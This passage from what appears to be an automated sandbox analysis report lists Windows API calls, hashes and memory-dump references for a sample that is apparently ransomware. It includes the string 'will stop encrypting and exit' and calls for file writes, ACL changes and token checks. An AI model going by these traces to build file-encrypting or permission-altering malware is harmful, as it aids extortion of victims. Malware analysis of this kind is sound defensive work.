                                                                    • Instruction ID: 5d05fdbd47c82d44b5ff40f033fd7fc8d176e459a3f0b62b1ceda0caddc7f677
                                                                    • Opcode Fuzzy Hash: 9b30fe1dcbaf85fdfd0630d47c531afc2823990d5aea52e60b58c1590db4b843
                                                                    • Instruction Fuzzy Hash: FB218B71A04618EFDB20DF55CC45FEEB7B8EB08711F100229E921B72C0D7756A09CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00E59CB6
                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000006,00000001,00000000), ref: 00E59CD3
                                                                    • FlushFileBuffers.KERNEL32(00000000), ref: 00E59CDA
                                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00E59CE1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$BuffersChangeCloseCreateFindFlushNotificationWrite
                                                                    • String ID:
                                                                    • API String ID: 2906694865-0
                                                                    • Opcode ID: e9c19a9527177aa84bd7f4fd07ddf9d0a9e9db1e7a147ee676bcfbd7f07191f6
                                                                    • Instruction ID: a2451f2cf1155b380d181432c0e6a3221fe850c02bc9005e3262ee05e3ccd198
                                                                    • Opcode Fuzzy Hash: e9c19a9527177aa84bd7f4fd07ddf9d0a9e9db1e7a147ee676bcfbd7f07191f6
                                                                    • Instruction Fuzzy Hash: E7119D71A04218AFCB10DF69CC48FDEBBB8EB09720F104229F915B72C0D7756A09CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00EE22E5,00000000,00E84B93,A6ABE2D4,?,00000000), ref: 00E84100
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00EE22E5), ref: 00E8411B
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00EE22E5), ref: 00E8413B
                                                                    • CreateThread.KERNELBASE ref: 00E84159
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Create$Event$Thread
                                                                    • String ID:
                                                                    • API String ID: 2525963256-0
                                                                    • Opcode ID: 5c5b4126b5f37fd1be572332dff6c8a7d84ec40c39b5277ea031a95df19a0bca
                                                                    • Instruction ID: 9b0633a7be8fcde1bb37926f1cb91584eba31e124363f5fc89db46c1875553d1
                                                                    • Opcode Fuzzy Hash: 5c5b4126b5f37fd1be572332dff6c8a7d84ec40c39b5277ea031a95df19a0bca
                                                                    • Instruction Fuzzy Hash: EA0121B0385702ABE3301F669C1AF127AE4AB04B05F10542CF749BA5D0D7F1E4058B58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • WriteFile.KERNELBASE(will stop encrypting and exit ,00000000,00000000,00000000), ref: 00E59FC0
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E59FDF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileMtx_unlockWrite
                                                                    • String ID: will stop encrypting and exit
                                                                    • API String ID: 2331889646-1730389960
                                                                    • Opcode ID: 3237d7f022e332aeeec590a8372e4ed4bf043527d224e3710660d28ab2fde7d0
                                                                    • Instruction ID: abd90d28014f34dc10ba966fff76f0a311d42a682433d062deeaa45de29deb32
                                                                    • Opcode Fuzzy Hash: 3237d7f022e332aeeec590a8372e4ed4bf043527d224e3710660d28ab2fde7d0
                                                                    • Instruction Fuzzy Hash: 55312976A00205DFCB14DF64DD42BBA77B8EF45704F08466DEC06EB391EB71AA09C6A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EB75AE: GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 00EB75F6
                                                                    • WriteFile.KERNEL32(?,00000000,147983CC,?,00000000,CCCCC369,00000000,00000000,?,?,CCCCCCCC,?,CCCCCCCC,?,147983CC,CCCCC35D), ref: 00EB7F6A
                                                                    • GetLastError.KERNEL32(?,?,CCCCCCCC,?,CCCCCCCC,?,147983CC,CCCCC35D), ref: 00EB7F74
                                                                    • __dosmaperr.LIBCMT ref: 00EB7FB9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                                                    • String ID:
                                                                    • API String ID: 251514795-0
                                                                    • Opcode ID: dde26f18a797c4ff29c84e4c8ca07f4e7d8f0ad448c06e47e90963787a118f77
                                                                    • Instruction ID: 705ea923206a3fcf3b02a1306ad774b261c061c8937644355c4cdc7a2cbcb456
                                                                    • Opcode Fuzzy Hash: dde26f18a797c4ff29c84e4c8ca07f4e7d8f0ad448c06e47e90963787a118f77
                                                                    • Instruction Fuzzy Hash: 09518071A0810AAFEB119BA8CC45BFF7BA9AF89314F142095E580BB691D770DD41C7A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00E84201
                                                                    • SetEvent.KERNEL32(?), ref: 00E8422D
                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00E8423D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MultipleObjectsWait$Event
                                                                    • String ID:
                                                                    • API String ID: 3717960846-0
                                                                    • Opcode ID: e5276ffa751a38f13bbd35547b78f0333d3a406dedc7632b557f07b783f0bfc7
                                                                    • Instruction ID: 97cd211bf19f9a04798532562dbf317da7912d151aa94879ae4c6c80d33989fa
                                                                    • Opcode Fuzzy Hash: e5276ffa751a38f13bbd35547b78f0333d3a406dedc7632b557f07b783f0bfc7
                                                                    • Instruction Fuzzy Hash: F9F08635208214AFD710AF56DC45F66B79DFB49B30F054168FA1CEB2E1D721A805CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateThread.KERNELBASE ref: 00EB08D5
                                                                    • GetLastError.KERNEL32(?,?,?,00E7470D,00000000,00000000,00E7AA00,00000000,00000000,?), ref: 00EB08E1
                                                                    • __dosmaperr.LIBCMT ref: 00EB08E8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateErrorLastThread__dosmaperr
                                                                    • String ID:
                                                                    • API String ID: 2744730728-0
                                                                    • Opcode ID: 849efa4a1e6b47818ca7ba5ec71e6e40162fcbaa961676596a4f4c4303bd29e6
                                                                    • Instruction ID: f3ca541322922b7c2feda6fee4e974e3995af08cd34c7a598ae686c742ee7fc3
                                                                    • Opcode Fuzzy Hash: 849efa4a1e6b47818ca7ba5ec71e6e40162fcbaa961676596a4f4c4303bd29e6
                                                                    • Instruction Fuzzy Hash: 4301BC32501219AFDF19AFA0DC06AEF7BA5EF41364F105069F802BA250EB31EE50DBD0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000001,00000000,00000000,00000000,00000000), ref: 00E86F54
                                                                    • SetEntriesInAclW.ADVAPI32(00000001,?,00000000,?), ref: 00E86F97
                                                                    • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000004,00000000,00000000,00000000,00000000), ref: 00E86FAB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InfoNamedSecurity$Entries
                                                                    • String ID:
                                                                    • API String ID: 2731562941-0
                                                                    • Opcode ID: 33908b032aea22440d66c4ee2a4cc5795987f505ac6f601c8a896f41967a36d3
                                                                    • Instruction ID: b4c9a48e320905f39b5f487f3739e77cae20d02ecdc93e320f8c152a0a3e3034
                                                                    • Opcode Fuzzy Hash: 33908b032aea22440d66c4ee2a4cc5795987f505ac6f601c8a896f41967a36d3
                                                                    • Instruction Fuzzy Hash: A5010C70A45308AFEB20DF95DC46FEDBBB9EB08714F500158F6007A2C0C7F669458B98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EB5650: GetLastError.KERNEL32(00000001,00000001,00E64837,00EACDBD,00EB64DF,00E64831,?,00EA8D0C,00E64837,00E64831,?,00000000,?,00E820BF,00E64835,00E64835), ref: 00EB5655
                                                                      • Part of subcall function 00EB5650: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00EA8D0C,00E64837,00E64831,?,00000000,?,00E820BF,00E64835,00E64835), ref: 00EB56F3
                                                                    • CloseHandle.KERNEL32(?,?,?,00EB091C,?,?,00EB078E,00000000), ref: 00EB0816
                                                                    • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00EB091C,?,?,00EB078E,00000000), ref: 00EB082C
                                                                    • ExitThread.KERNEL32 ref: 00EB0835
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                    • String ID:
                                                                    • API String ID: 1991824761-0
                                                                    • Opcode ID: bda0d0dc7fc9c89d0813f805ca564ca62c49c60d0e9c90e994429700558c4284
                                                                    • Instruction ID: f7d39b819569ce82a0ef19d5505bc4b8ba065444780f628d77845d9d3ecc561c
                                                                    • Opcode Fuzzy Hash: bda0d0dc7fc9c89d0813f805ca564ca62c49c60d0e9c90e994429700558c4284
                                                                    • Instruction Fuzzy Hash: 41F082314056146FCB295B36CE08A9B7B98AF40364F4C5634F865F61E2EB36FE46C6D0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000000,00000000,?,00EB7F4E,?,00000000,00000000,147983CC,CCCCC369,00000000), ref: 00EB7ACD
                                                                    • GetLastError.KERNEL32(?,00EB7F4E,?,00000000,00000000,147983CC,CCCCC369,00000000,00000000,?,?,CCCCCCCC,?,CCCCCCCC,?,147983CC), ref: 00EB7AF3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorFileLastWrite
                                                                    • String ID:
                                                                    • API String ID: 442123175-0
                                                                    • Opcode ID: c8797637ab4c51a22a87fe2c2560a25a1981f8447231fac404fbdb766b2bd42e
                                                                    • Instruction ID: 9730a73ade918ce9fb181dec28a55c50253d7d7caf94b6c33841e8bfcadcd6b0
                                                                    • Opcode Fuzzy Hash: c8797637ab4c51a22a87fe2c2560a25a1981f8447231fac404fbdb766b2bd42e
                                                                    • Instruction Fuzzy Hash: 99219430A042199FCB15CF29DC809DEB7FAEB9D301F1441A9E986E7351D630DE46CB60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • OpenProcessToken.ADVAPI32(00000008,?), ref: 00E58286
                                                                    • GetTokenInformation.KERNELBASE(000CC123,00000001(TokenIntegrityLevel),00000000,00000064,?), ref: 00E582AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Token$InformationOpenProcess
                                                                    • String ID:
                                                                    • API String ID: 1620003723-0
                                                                    • Opcode ID: a8475528f6ab2a515611ae05aa45e758f474262e6012ec2103b979d0f851c1d4
                                                                    • Instruction ID: 974a5568d301f3aea585f9fb8621373d965c057dc637e219bd7739e7b0468c23
                                                                    • Opcode Fuzzy Hash: a8475528f6ab2a515611ae05aa45e758f474262e6012ec2103b979d0f851c1d4
                                                                    • Instruction Fuzzy Hash: 0D21F835901108ABD7209FA4DC41EAF7BB5EF49310F000569ED05BB351DB756A19CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _free.LIBCMT ref: 00EB7341
                                                                      • Part of subcall function 00EB649C: RtlAllocateHeap.NTDLL(00000000,00000001,00E64831,?,00EA8D0C,00E64837,00E64831,?,00000000,?,00E820BF,00E64835,00E64835), ref: 00EB64CE
                                                                    • RtlReAllocateHeap.NTDLL(00000000,00000000,00E842F9,00000000,0000012C,?,00E842F9,00000000,0000012C,?,?,?), ref: 00EB737D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AllocateHeap$_free
                                                                    • String ID:
                                                                    • API String ID: 1482568997-0
                                                                    • Opcode ID: ef5dd920392362f1b157037510b4b21c8a0a95161b9b944c73a487fa2e0f6018
                                                                    • Instruction ID: 1e91148d53aa0b55fd8168a3b6399d08d91fd8a5c74c310e7c6ddff36138d6b3
                                                                    • Opcode Fuzzy Hash: ef5dd920392362f1b157037510b4b21c8a0a95161b9b944c73a487fa2e0f6018
                                                                    • Instruction Fuzzy Hash: 02F0FC321592056EDB3136215C00BEB37D89FC2B70B287125FD94B65A1DB21D80171A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetLastError.KERNEL32(00EED338,0000000C), ref: 00EB0743
                                                                    • ExitThread.KERNEL32 ref: 00EB074A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorExitLastThread
                                                                    • String ID:
                                                                    • API String ID: 1611280651-0
                                                                    • Opcode ID: 6ad17a312149bfeddd938ea5b251265680fb20555de7eb3f956da149793c07b4
                                                                    • Instruction ID: 138ba462370fcefaeefb8544572e59e336e1cb935bee007bc83742f0688a8a7c
                                                                    • Opcode Fuzzy Hash: 6ad17a312149bfeddd938ea5b251265680fb20555de7eb3f956da149793c07b4
                                                                    • Instruction Fuzzy Hash: A2F0AF71904204AFDB00BBB5C84AEAF7BB1EF44711F241059F411BB292DB366941CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • std::locale::_Init.LIBCPMT ref: 00E736F5
                                                                      • Part of subcall function 00EA6294: __EH_prolog3.LIBCMT ref: 00EA629B
                                                                      • Part of subcall function 00EA6294: std::_Lockit::_Lockit.LIBCPMT ref: 00EA62A6
                                                                      • Part of subcall function 00EA6294: std::locale::_Setgloballocale.LIBCPMT ref: 00EA62C1
                                                                      • Part of subcall function 00EA6294: _Yarn.LIBCPMT ref: 00EA62D7
                                                                      • Part of subcall function 00EA6294: std::_Lockit::~_Lockit.LIBCPMT ref: 00EA6317
                                                                      • Part of subcall function 00E81E60: std::_Lockit::_Lockit.LIBCPMT ref: 00E81EB0
                                                                      • Part of subcall function 00E81E60: std::_Lockit::_Lockit.LIBCPMT ref: 00E81ED2
                                                                      • Part of subcall function 00E81E60: std::_Lockit::~_Lockit.LIBCPMT ref: 00E81EFA
                                                                      • Part of subcall function 00E81E60: std::_Lockit::~_Lockit.LIBCPMT ref: 00E82034
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$std::locale::_$H_prolog3InitSetgloballocaleYarn
                                                                    • String ID:
                                                                    • API String ID: 3401496928-0
                                                                    • Opcode ID: 0bea90aa22c9a58898b599bc9688748bcc15af3a7fd044dbefd24d647ac15948
                                                                    • Instruction ID: e6c6c17886ccd464d1f778d357bd9717e3a52af0928580a375865c8f2862657b
                                                                    • Opcode Fuzzy Hash: 0bea90aa22c9a58898b599bc9688748bcc15af3a7fd044dbefd24d647ac15948
                                                                    • Instruction Fuzzy Hash: 49514FB5A002048FDB04DF58C895B5ABBF5FF48724F24819DE805AF382D776A945CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00E83C57
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Concurrency::cancel_current_task
                                                                    • String ID:
                                                                    • API String ID: 118556049-0
                                                                    • Opcode ID: fededb48f655c17e6fd80e415cba58b26bb087420b4d1f766b7fb17e1fb57bd2
                                                                    • Instruction ID: 3767a0b869194d524b46dce9206830e5434011afbd7e376ae994ee3c4e822a07
                                                                    • Opcode Fuzzy Hash: fededb48f655c17e6fd80e415cba58b26bb087420b4d1f766b7fb17e1fb57bd2
                                                                    • Instruction Fuzzy Hash: 5621C5726001085BD708FA789C85A6EF7DDEB95750B04463AFD0CEB642D770EE5087B5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00E73A14
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Concurrency::cancel_current_task
                                                                    • String ID:
                                                                    • API String ID: 118556049-0
                                                                    • Opcode ID: a66b104dd8922313114dc97b8867b9ebdebdff99b811bc101b22b04861d1877f
                                                                    • Instruction ID: f05b6ffbc3d0ebd2c7e2b2601781e67fbba1ccbb89336742c9d334d90d2f82e5
                                                                    • Opcode Fuzzy Hash: a66b104dd8922313114dc97b8867b9ebdebdff99b811bc101b22b04861d1877f
                                                                    • Instruction Fuzzy Hash: 2D11AB721001080AD718E7B89C46E5EB7AECBD0354B04C42AF84CEF507EB31FB54C2A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5925671aadc92387ddfbf036150e1219739bdc6207cf3fcdf691b4d46f73683d
                                                                    • Instruction ID: 04f3e936da846db2f1b515fc586e67aa17317eaa45d5f54389a554617bbe66e0
                                                                    • Opcode Fuzzy Hash: 5925671aadc92387ddfbf036150e1219739bdc6207cf3fcdf691b4d46f73683d
                                                                    • Instruction Fuzzy Hash: FF01F537604B159F9B169E6EEC80ADB7B97ABC53347159220FA04EB195DA31D8028B90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,00E64835,00000000,?,00EB569B,00000001,00000364,00000006,000000FF,?,00EA8D0C,00E64837,00E64831,?,00000000), ref: 00EB5929
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: fbebf544c2108b4bf9674075e1986c58679578877b3ef46dae4da358ec7a367d
                                                                    • Instruction ID: e05d65b5af2e0022db3306dd2d66acc47cd792809716a2c2e88949baf40e494b
